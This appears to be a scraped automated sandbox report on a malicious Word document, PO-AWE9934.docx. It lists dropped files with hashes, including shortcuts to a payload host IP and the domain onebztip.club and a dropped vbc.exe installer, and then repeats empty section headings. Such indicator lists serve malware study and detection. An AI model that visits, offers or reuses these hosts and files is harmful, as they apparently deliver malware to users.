C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\invoice on 107.172.93.32.url	MS Windows 95 Internet shortcut text (URL=<http://107.172.93.32/invoice/>), ASCII text, with CRLF line terminators	28CBF3C459A7537D13B3B62806D777A1	AE90E0A1262A95C08931ECDF21D3E49D83A2480D	F9779F8EBA286B70D49E23EB2044FC43DF268A291D4E373912F6626901D52018
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\x.url	MS Windows 95 Internet shortcut text (URL=<https://onebztip.club/index.php/x>), ASCII text, with CRLF line terminators	0C1720CE77D7C0CEE677679898F353BD	A4FCE20000A3B61180A0E0B303568B392E69F794	6ADAF18CA9EB4EE0E6D3616EC15AA4CE721118FC1E467335A9AE4132961BAA78
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	data	6525B5171CE36A6D7EDB3E4DFD5CB579	70AFC3864539BCF8F1C4CD336F6096534A6268FA	617E1415F4483DAE29072F8E5A042E9EB3446F53F9AC2F26180AECD1D93151CF
C:\Users\user\Desktop\~$-AWE9934.docx	data	6525B5171CE36A6D7EDB3E4DFD5CB579	70AFC3864539BCF8F1C4CD336F6096534A6268FA	617E1415F4483DAE29072F8E5A042E9EB3446F53F9AC2F26180AECD1D93151CF
C:\Users\Public\vbc.exe	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive	38034F18AF511C3B04B25170735E8B8E	797252E9139D3D46825440335437AD9D538F6B5B	7BABDD2C7D3752B7B48729110F0AB94DE7CF74C478B7E1EA7A71A468748E70C0

Windows Analysis Report
PO-AWE9934.docx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report PO-AWE9934.docx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
PO-AWE9934.docx